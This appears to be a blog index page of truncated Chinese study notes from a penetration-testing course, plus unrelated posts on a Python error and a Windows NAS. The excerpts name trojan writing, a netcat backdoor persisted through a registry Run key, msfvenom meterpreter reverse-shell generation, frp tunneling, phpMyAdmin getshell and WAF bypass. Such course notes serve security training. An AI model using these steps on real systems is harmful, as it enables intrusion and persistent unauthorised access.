T3sec 学习笔记—–第十一讲-自编木马实战
T3SEC —–第十一讲:自编木马实战 自编 进入环境后可不依赖其他工具 自编远程控制电脑木马 涉及知识或技术: 操作系统 win/linux/unix/android ........ 命令,服务,特性. 网络协议 osi七层网络 tcp/ip 协议族群 应用层 传输层:tcp/udp 网络层 链路层 实用的程序语言 python go ruby htm...
T3SEC —–第十一讲:自编木马实战 自编 进入环境后可不依赖其他工具 自编远程控制电脑木马 涉及知识或技术: 操作系统 win/linux/unix/android ........ 命令,服务,特性. 网络协议 osi七层网络 tcp/ip 协议族群 应用层 传输层:tcp/udp 网络层 链路层 实用的程序语言 python go ruby htm...
T3SEC —–第十二讲:阻网小军刀 实战自编阻网小军刀/木马/蠕虫 岗位: 等保测评网络安全,系统安全,web渗透工具.对数据库,网络等的渗透攻防 安全运维网络系统维护,保护防止黑客攻击. 网络安全,系统安全 web渗透,渗透实战 渗透测试模拟黑客攻击,挖掘漏洞,隐患 并提出意见.web安全编程,web渗透,渗透实战,python黑帽子 攻防工程师黑帽子,白帽子.网络安全 ,系统安全,w...
T3SEC —–第十三讲:webshell webshell,截屏远程控制利器 技术分解: webspp:web应用 http:80/https:443/ws:80/wss:443 通信协议: http(https)/tcp/udp/ws(wss) cmd/shell等 html/css/js等 python/asp/php/jsp等 二进制等 流控制等 webshell...
网上找好了好久才知道是系统不同的问题,我这里是windows10 File "D:\python38\lib\sitepackages\tornado\tcpserver.py", line 244, in start self.addsockets(sockets) File "D:\python38\lib\sitepackages\tornado\tcpserver...
T3SEC —–第九讲:内网转发穿透 内网穿透和代理转发 一.内网穿透 花生壳 frp 等...... 内网穿透获取内网服务器的session 配置frp穿透 https://github.com/fatedier/frp 22==6000 4444==6002 使用木马反弹session msfvenom p windows/meterpreter/reversetcp L...
T3SEC —–第八讲:nc后门 隐藏后门 1.nc后门上传 upload/root/nc.exe c:\\\windows\\system32 2.修改注册表 reg enumkey k HKLM\\softfware\\microsoft\\windows\\currentversion\\run reg setval k HKLM\\software\\microsoft\\w...
T3SEC —–第十讲:服务器安全加固 长城网络靶场竞技系统 实验吧 ctf训练营 各体系路线 1.网络安全:协议分析,企业网络安全架构设计项目实战 2.系统安全:系统加固,入侵排查,应急响应 3.web安全编程:http,php,java,数据库安全 4.web渗透工具:工具,SRC,漏洞挖掘,代码审计,web渗透测试项目实战 5.渗透实战:主机渗透,内网渗透,python渗透编程,...
T3SEC —–第七讲:后渗透信息收集 反弹连接木马获取shell msfvenom p windows/meterpreter/reversetcp LHOST=192.168.5.102 LHOST=4444 f exe 2020shell.exe python m SimpleHTTPServer 8080 //开启http服务 Msf开启监听: use exploit/mu...
T3SEC —–第六讲:webshell提权 phpmyadmin getshell到提权 一.环境准备: 靶机:win7 32位 环境: php:5.45 mysql:5.5.53 Apache:2.43 二.开始攻击 访问发现3306端口打开.经过弱口令,爆破,目录泄露等途径已经获知phpmyadmin的账号密码是root root 1.开始登陆到phpmyadmin 注意大小写 中英文标点...
T3SEC —–第四讲:SQL漏洞注入及WAF绕过 一.WAF相关介绍 WAF(Web Application Firewall)web应用防火墙 WAF 有哪些 1.软件型WAF 2.硬件型WAF 3.云WAF---反向代理模式工作,通过配置NS记录或者CNAME记录,带有防护的CDN 4.网站系统内置的WAF WAF的功能: 1.审计 2.访问控制/过滤 3.架构安全的网络设计 4.web加固...
T3SEC —–第三讲:web应用安全 OWASPOpen Web Application Security Project 组织.开源. 会员 发送邮件到member@owasp.org.cn即可参加. ISCCISSP OWASP Top10(10大应用安全风险) 1.注入 2.失效的身份认证和会话管理 3.XSS 跨站脚本攻击 4.不安全的对象直接引用 5.CSRF 跨站请求伪...
使用windows server 2016 组建 nas Q:为什么使用 windows server 2016 ? A:相对于freenas ,黑裙等纯nas系统,windows server 更自由,可以实现nas需求的同时来做其他的事情,至于做什么,看个人需求. windows server 2016 的下载地址: MSDN 安装过程就 省略了,可以参照其他windows系统安装. 一.开启...